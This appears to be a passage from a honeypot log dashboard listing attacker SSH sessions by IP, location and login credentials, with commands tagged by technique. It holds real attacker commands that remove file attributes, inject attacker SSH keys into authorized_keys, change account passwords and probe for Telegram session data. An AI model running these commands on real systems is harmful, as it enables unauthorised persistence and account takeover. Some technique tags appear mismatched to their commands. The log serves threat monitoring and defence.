↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 panda_root_21 (123.150.157.146) — Youyilu, China · 1 session · 1 cmd

2026-03-24 05:34 EDT · as root/root

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 rogue_root_45 (103.67.78.217) — Cileunyi, Indonesia · 2 sessions · 4 cmds

2026-03-16 01:06 EDT · as oracle/1, oracle/Oracle123!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

🎭 jade_root_17 (116.176.58.41) — Jinrongjie, China · 1 session · 1 cmd

2026-03-24 00:21 EDT · as root/root

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 abba_root_2 (171.25.158.74) — Vaxjo, Sweden · 1 session · 2 cmds

2026-03-23 22:25 EDT · as oracle/Oracle123!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 ghost_root_71 (78.44.192.210) — Prague, Czechia · 2 sessions · 21 cmds

2026-03-17 02:52 EDT · as oracle/Oracle123!, root/12345678

file attribute tampering → SSH key persistence → CPU profiling → execute from /tmp → persistence setup

$ cd ~; chattr -ia .ssh; lockr -ia .ssh ×2

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ×2

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo "root:8MKnGGQCwKLM"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 dragon_root_20 (120.48.17.7) — Beijing, China · 1 session · 1 cmd

2026-03-23 20:59 EDT · as root/root

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 seoul_root_12 (175.215.107.165) — Gimhae, South Korea · 1 session · 9 cmds

2026-03-23 10:10 EDT · as root/root

Credential validation (root/root) → OS fingerprinting (uname -a, /ip cloud print) → hardware profiling (ifconfig, cat /proc/cpuinfo) → cryptomining reconnaissance (ps | grep miner, ps -ef | grep miner) → targeted data exfiltration probe (ls -la ~/.local/share/TelegramDesktop/tdata, locate D877F783

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 carnival_root_3 (201.17.133.138) — Nova Lima, Brazil · 1 session · 20 cmds

2026-03-23 09:40 EDT · as test/test

cd ~; chattr -ia .ssh; lockr -ia .ssh → cd ~ && rm -rf .ssh && mkdir .ssh → echo "ssh-rsa..." → cat /proc/cpuinfo | grep name | wc -l → echo "test\nzaxEc6joTQTW\nzaxEc6joTQTW"|passwd|bash → Enter new UNIX password

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "test\nzaxEc6joTQTW\nzaxEc6joTQTW"|passwd|bash

$ Enter new UNIX password:

$ echo "test\nzaxEc6joTQTW\nzaxEc6joTQTW\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 cipher_root_70 (161.132.180.118) — Lima, Peru · 1 session · 20 cmds

2026-03-23 09:22 EDT · as deploy/deploy123

ssh-rsa key injection → .ssh directory sanitization and chattr locking → passwd brute-force with hardcoded deploy/deploy123 → hardware profiling via /proc/cpuinfo → memory audit with free → binary inspection of ls → cron persistence check → system load monitoring via top

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "deploy123\ndFp3nl3fLfWL\ndFp3nl3fLfWL"|passwd|bash

$ Enter new UNIX password:

$ echo "deploy123\ndFp3nl3fLfWL\ndFp3nl3fLfWL\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 ghost_root_72 (113.160.241.199) — Da Nang, Vietnam · 2 sessions · 2 cmds

2026-03-21 17:03 EDT · as root/admin

echo

$ echo TEST ×2

🎭 chateau_root (161.97.123.69) — Lauterbourg, France · 16 sessions · 48 cmds

2026-03-23 05:13 EDT · as admin/admin123, deploy/deploy, guest/guest

make executable (world) → core count check

$ arch_info=$(uname -m); cpu_count=$(nproc); echo -e "yx4V7fp7\nyx4V7fp7" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPkcUOA/x/v3jySnP6HCyjn6QzKILlMl8zB3RKHiw0f14sRESr4SbI/Dp2SokPZxNBJwwa4MUa/hx5bTE/UqNU2+b6b+W+zR9YRl610TFE/mUaFiXgtnmQsrGG6zflB5JjxzWaHl3RRpHhaOe5GdPzf1OhXJv4mCt2VKwcLWIyRQxN3fsrrlCF2Sr3c0SjaYmhAnXtqmednQE+rw== server" > ${HOME}/.ssh/authorized_keys; chmod 600 ${HOME}/.ssh/authorized_keys >/dev/null 2>&1; chmod 700 ${HOME}/.ssh >/dev/null 2>&1; echo "$arch_info:$cpu_count"

↳ make executable (world)

$ uname -m ×16

$ nproc ×16

↳ core count check

$ arch_info=$(uname -m); cpu_count=$(nproc); echo -e "user\n22nmQ9Lo\n22nmQ9Lo" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPkcUOA/x/v3jySnP6HCyjn6QzKILlMl8zB3RKHiw0f14sRESr4SbI/Dp2SokPZxNBJwwa4MUa/hx5bTE/UqNU2+b6b+W+zR9YRl610TFE/mUaFiXgtnmQsrGG6zflB5JjxzWaHl3RRpHhaOe5GdPzf1OhXJv4mCt2VKwcLWIyRQxN3fsrrlCF2Sr3c0SjaYmhAnXtqmednQE+rw== server" > ${HOME}/.ssh/authorized_keys; chmod 600 ${HOME}/.ssh/authorized_keys >/dev/null 2>&1; chmod 700 ${HOME}/.ssh >/dev/null 2>&1; echo "$arch_info:$cpu_count"

↳ make executable (world)

$ arch_info=$(uname -m); cpu_count=$(nproc); echo -e "Qm5taZ8l\nQm5taZ8l" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPkcUOA/x/v3jySnP6HCyjn6QzKILlMl8zB3RKHiw0f14sRESr4SbI/Dp2SokPZxNBJwwa4MUa/hx5bTE/UqNU2+b6b+W+zR9YRl610TFE/mUaFiXgtnmQsrGG6zflB5JjxzWaHl3RRpHhaOe5GdPzf1OhXJv4mCt2VKwcLWIyRQxN3fsrrlCF2Sr3c0SjaYmhAnXtqmednQE+rw== server" > ${HOME}/.ssh/authorized_keys; chmod 600 ${HOME}/.ssh/authorized_keys >/dev/null 2>&1; chmod 700 ${HOME}/.ssh >/dev/null 2>&1; echo "$arch_info:$cpu_count"

↳ make executable (world)

$ arch_info=$(uname -m); cpu_count=$(nproc); echo -e "tomcat\niUWUeinQ\niUWUeinQ" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPkcUOA/x/v3jySnP6HCyjn6QzKILlMl8zB3RKHiw0f14sRESr4SbI/Dp2SokPZxNBJwwa4MUa/hx5bTE/UqNU2+b6b+W+zR9YRl610TFE/mUaFiXgtnmQsrGG6zflB5JjxzWaHl3RRpHhaOe5GdPzf1OhXJv4mCt2VKwcLWIyRQxN3fsrrlCF2Sr3c0SjaYmhAnXtqmednQE+rw== server" > ${HOME}/.ssh/authorized_keys; chmod 600 ${HOME}/.ssh/authorized_keys >/dev/null 2>&1; chmod 700 ${HOME}/.ssh >/dev/null 2>&1; echo "$arch_info:$cpu_count"

↳ make executable (world)

$ arch_info=$(uname -m); cpu_count=$(nproc); echo -e "oracle\nLumnPafn\nLumnPafn" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPkcUOA/x/v3jySnP6HCyjn6QzKILlMl8zB3RKHiw0f14sRESr4SbI/Dp2SokPZxNBJwwa4MUa/hx5bTE/UqNU2+b6b+W+zR9YRl610TFE/mUaFiXgtnmQsrGG6zflB5JjxzWaHl3RRpHhaOe5GdPzf1OhXJv4mCt2VKwcLWIyRQxN3fsrrlCF2Sr3c0SjaYmhAnXtqmednQE+rw== server" > ${HOME}/.ssh/authorized_keys; chmod 600 ${HOME}/.ssh/authorized_keys >/dev/null 2>&1; chmod 700 ${HOME}/.ssh >/dev/null 2>&1; echo "$arch_info:$cpu_count"

↳ make executable (world)

$ arch_info=$(uname -m); cpu_count=$(nproc); echo -e "oracle123\nRkbGX2BO\nRkbGX2BO" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPkcUOA/x/v3jySnP6HCyjn6QzKILlMl8zB3RKHiw0f14sRESr4SbI/Dp2SokPZxNBJwwa4MUa/hx5bTE/UqNU2+b6b+W+zR9YRl610TFE/mUaFiXgtnmQsrGG6zflB5JjxzWaHl3RRpHhaOe5GdPzf1OhXJv4mCt2VKwcLWIyRQxN3fsrrlCF2Sr3c0SjaYmhAnXtqmednQE+rw== server" > ${HOME}/.ssh/authorized_keys; chmod 600 ${HOME}/.ssh/authorized_keys >/dev/null 2>&1; chmod 700 ${HOME}/.ssh >/dev/null 2>&1; echo "$arch_info:$cpu_count"

↳ make executable (world)

$ arch_info=$(uname -m); cpu_count=$(nproc); echo -e "ubuntu\n7Ezsu0nW\n7Ezsu0nW" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPkcUOA/x/v3jySnP6HCyjn6QzKILlMl8zB3RKHiw0f14sRESr4SbI/Dp2SokPZxNBJwwa4MUa/hx5bTE/UqNU2+b6b+W+zR9YRl610TFE/mUaFiXgtnmQsrGG6zflB5JjxzWaHl3RRpHhaOe5GdPzf1OhXJv4mCt2VKwcLWIyRQxN3fsrrlCF2Sr3c0SjaYmhAnXtqmednQE+rw== server" > ${HOME}/.ssh/authorized_keys; chmod 600 ${HOME}/.ssh/authorized_keys >/dev/null 2>&1; chmod 700 ${HOME}/.ssh >/dev/null 2>&1; echo "$arch_info:$cpu_count"

↳ make executable (world)

$ arch_info=$(uname -m); cpu_count=$(nproc); echo -e "postgres\nwJSDIhqu\nwJSDIhqu" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPkcUOA/x/v3jySnP6HCyjn6QzKILlMl8zB3RKHiw0f14sRESr4SbI/Dp2SokPZxNBJwwa4MUa/hx5bTE/UqNU2+b6b+W+zR9YRl610TFE/mUaFiXgtnmQsrGG6zflB5JjxzWaHl3RRpHhaOe5GdPzf1OhXJv4mCt2VKwcLWIyRQxN3fsrrlCF2Sr3c0SjaYmhAnXtqmednQE+rw== server" > ${HOME}/.ssh/authorized_keys; chmod 600 ${HOME}/.ssh/authorized_keys >/dev/null 2>&1; chmod 700 ${HOME}/.ssh >/dev/null 2>&1; echo "$arch_info:$cpu_count"

↳ make executable (world)

$ arch_info=$(uname -m); cpu_count=$(nproc); echo -e "tomcat123\nMLW20V5R\nMLW20V5R" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPkcUOA/x/v3jySnP6HCyjn6QzKILlMl8zB3RKHiw0f14sRESr4SbI/Dp2SokPZxNBJwwa4MUa/hx5bTE/UqNU2+b6b+W+zR9YRl610TFE/mUaFiXgtnmQsrGG6zflB5JjxzWaHl3RRpHhaOe5GdPzf1OhXJv4mCt2VKwcLWIyRQxN3fsrrlCF2Sr3c0SjaYmhAnXtqmednQE+rw== server" > ${HOME}/.ssh/authorized_keys; chmod 600 ${HOME}/.ssh/authorized_keys >/dev/null 2>&1; chmod 700 ${HOME}/.ssh >/dev/null 2>&1; echo "$arch_info:$cpu_count"

↳ make executable (world)

$ arch_info=$(uname -m); cpu_count=$(nproc); echo -e "guest\ngOjIhNwZ\ngOjIhNwZ" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPkcUOA/x/v3jySnP6HCyjn6QzKILlMl8zB3RKHiw0f14sRESr4SbI/Dp2SokPZxNBJwwa4MUa/hx5bTE/UqNU2+b6b+W+zR9YRl610TFE/mUaFiXgtnmQsrGG6zflB5JjxzWaHl3RRpHhaOe5GdPzf1OhXJv4mCt2VKwcLWIyRQxN3fsrrlCF2Sr3c0SjaYmhAnXtqmednQE+rw== server" > ${HOME}/.ssh/authorized_keys; chmod 600 ${HOME}/.ssh/authorized_keys >/dev/null 2>&1; chmod 700 ${HOME}/.ssh >/dev/null 2>&1; echo "$arch_info:$cpu_count"

↳ make executable (world)

$ arch_info=$(uname -m); cpu_count=$(nproc); echo -e "admin123\n5aXmJnDF\n5aXmJnDF" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPkcUOA/x/v3jySnP6HCyjn6QzKILlMl8zB3RKHiw0f14sRESr4SbI/Dp2SokPZxNBJwwa4MUa/hx5bTE/UqNU2+b6b+W+zR9YRl610TFE/mUaFiXgtnmQsrGG6zflB5JjxzWaHl3RRpHhaOe5GdPzf1OhXJv4mCt2VKwcLWIyRQxN3fsrrlCF2Sr3c0SjaYmhAnXtqmednQE+rw== server" > ${HOME}/.ssh/authorized_keys; chmod 600 ${HOME}/.ssh/authorized_keys >/dev/null 2>&1; chmod 700 ${HOME}/.ssh >/dev/null 2>&1; echo "$arch_info:$cpu_count"

↳ make executable (world)

$ arch_info=$(uname -m); cpu_count=$(nproc); echo -e "3qRh3wYT\n3qRh3wYT" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPkcUOA/x/v3jySnP6HCyjn6QzKILlMl8zB3RKHiw0f14sRESr4SbI/Dp2SokPZxNBJwwa4MUa/hx5bTE/UqNU2+b6b+W+zR9YRl610TFE/mUaFiXgtnmQsrGG6zflB5JjxzWaHl3RRpHhaOe5GdPzf1OhXJv4mCt2VKwcLWIyRQxN3fsrrlCF2Sr3c0SjaYmhAnXtqmednQE+rw== server" > ${HOME}/.ssh/authorized_keys; chmod 600 ${HOME}/.ssh/authorized_keys >/dev/null 2>&1; chmod 700 ${HOME}/.ssh >/dev/null 2>&1; echo "$arch_info:$cpu_count"

↳ make executable (world)

$ arch_info=$(uname -m); cpu_count=$(nproc); echo -e "LYLFliLQ\nLYLFliLQ" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPkcUOA/x/v3jySnP6HCyjn6QzKILlMl8zB3RKHiw0f14sRESr4SbI/Dp2SokPZxNBJwwa4MUa/hx5bTE/UqNU2+b6b+W+zR9YRl610TFE/mUaFiXgtnmQsrGG6zflB5JjxzWaHl3RRpHhaOe5GdPzf1OhXJv4mCt2VKwcLWIyRQxN3fsrrlCF2Sr3c0SjaYmhAnXtqmednQE+rw== server" > ${HOME}/.ssh/authorized_keys; chmod 600 ${HOME}/.ssh/authorized_keys >/dev/null 2>&1; chmod 700 ${HOME}/.ssh >/dev/null 2>&1; echo "$arch_info:$cpu_count"

↳ make executable (world)

$ arch_info=$(uname -m); cpu_count=$(nproc); echo -e "test\nv8gV6VrZ\nv8gV6VrZ" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPkcUOA/x/v3jySnP6HCyjn6QzKILlMl8zB3RKHiw0f14sRESr4SbI/Dp2SokPZxNBJwwa4MUa/hx5bTE/UqNU2+b6b+W+zR9YRl610TFE/mUaFiXgtnmQsrGG6zflB5JjxzWaHl3RRpHhaOe5GdPzf1OhXJv4mCt2VKwcLWIyRQxN3fsrrlCF2Sr3c0SjaYmhAnXtqmednQE+rw== server" > ${HOME}/.ssh/authorized_keys; chmod 600 ${HOME}/.ssh/authorized_keys >/dev/null 2>&1; chmod 700 ${HOME}/.ssh >/dev/null 2>&1; echo "$arch_info:$cpu_count"

↳ make executable (world)

